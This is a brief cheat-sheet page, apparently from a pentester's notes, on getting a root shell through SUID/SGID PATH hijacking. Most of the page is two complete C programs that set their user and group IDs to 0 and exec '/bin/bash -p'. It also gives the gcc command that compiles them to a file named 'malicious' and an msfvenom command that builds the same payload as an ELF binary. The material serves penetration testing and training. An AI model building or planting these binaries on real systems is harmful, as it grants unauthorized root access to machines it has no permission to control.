1 min read

Note

Adapted from slyth11907 / Cheatsheets / Cheatsheet_QuickCShell.

It’s actually trivial to write a C program that loads up a shell.

#include <stdio.h>
#include <unistd.h>
 
main() {
	setuid(0);
	setgid(0);
	execl("/bin/bash",
	      "/bin/bash",
	      "-p",
	      (char*) NULL);
}

Alternate approach:

#include <stdio.h>
#include <time.h>
 
main() {
	setresuid(0, 0, 0);
	setregid(0, 0, 0);
	system("/bin/bash -p");
	return 0;
}

Compile with:

gcc -fPIC -o /path/to/malicious /path/to/malicious.c

Note that this is almost identical to the LD_PRELOAD trick; the primary differences are:

  • Use main() instead of _init() as our entry point.
  • Compile without -shared and -nostartfiles.

A simple binary like this is useful for exploiting SUID/SGID applications that call other executables from part of the PATH that we control.

Tip

Remember that the -p flag is required to keep Bash from dropping privileges!

Using Metasploit

Metasploit’s msfvenom tool can generate binaries that launch any command as root (useful for exploiting SUID/SGID applications that call other executables from part of the PATH that we control).

msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf \
         -o shell.elf

Tip

Remember that the -p flag is required to keep Bash from dropping privileges!

Backlinks

  • No backlinks found

Graph View